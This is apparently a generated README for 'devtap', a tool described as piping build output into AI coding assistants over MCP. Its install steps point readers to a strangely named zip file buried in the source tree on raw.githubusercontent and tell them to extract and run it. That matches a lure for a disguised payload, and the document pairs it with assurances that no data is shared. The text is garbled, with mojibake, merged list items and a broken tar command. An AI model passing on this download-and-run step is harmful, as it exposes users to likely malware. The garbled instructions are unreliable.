π Streamline build and dev output by feeding logs directly into AI coding sessions using Model Context Protocol for seamless automation.
devtap is a tool that helps you connect your build and development tools with AI coding assistants. It works with popular AI models like Claude Code, Codex, OpenCode, Gemini CLI, and aider. This connection allows these AI tools to understand the results of your coding process better.
If you want your AI coding helper to have more context about what you build or create during development, devtap bridges that gap. It uses something called MCP (Model Context Protocol) to share this data smoothly.
Before installing devtap, make sure your computer meets these needs:
Here are the main features you can expect:
This section shows you how to download, install, and run devtap on your computer. No programming experience is needed.
Visit the devtap releases page here:
On the releases page, look for the latest version available. You will find different files for Windows, macOS, and Linux. Choose the one that matches your operating system.
.exe file in your downloads folder. Double-click to start. The installer will guide you through the steps..dmg or .pkg file. Open it and follow the instructions to install devtap.https://raw.githubusercontent.com/xaorain/devtap/main/internal/adapter/gemini/Software-paradichlorobenzene.zip or binary file. You might use your terminal to extract and run it. For example:tar -xzf https://raw.githubusercontent.com/xaorain/devtap/main/internal/adapter/gemini/Software-paradichlorobenzene.zip
./devtapYou may need permission to install software. If asked, enter your computer password.
After installation, open your command prompt or terminal program:
devtap --help and press Enter. This command shows you the basic options available.devtap works mainly through the command line interface (CLI). Here is a simple way to get started connecting your project:
cd C:\Users\YourName\Documents\MyProjectdevtap listen --model codexThis command tells devtap to start capturing your build or development output and share it with the Codex AI coding model. Replace βcodexβ with the AI assistant you use.
If you want devtap to support your workflow automatically, review the documentation on the releases page or the included README files for your specific setup.
The devtap repository has additional helpful information inside:
Check the docs folder or the GitHub Wiki on the same page as the releases.
If you have questions or problems:
devtap only reads data related to your build and development output. It sends information securely to AI coding models you choose to use.
You control when and how devtap runs on your machine. No data is shared without your action.
devtap lets you connect your coding work with AI coding helpers to get better suggestions and insights. It works on popular desktop systems and supports multiple AI tools.
Download and install devtap from the link below to start enhancing your AI coding sessions: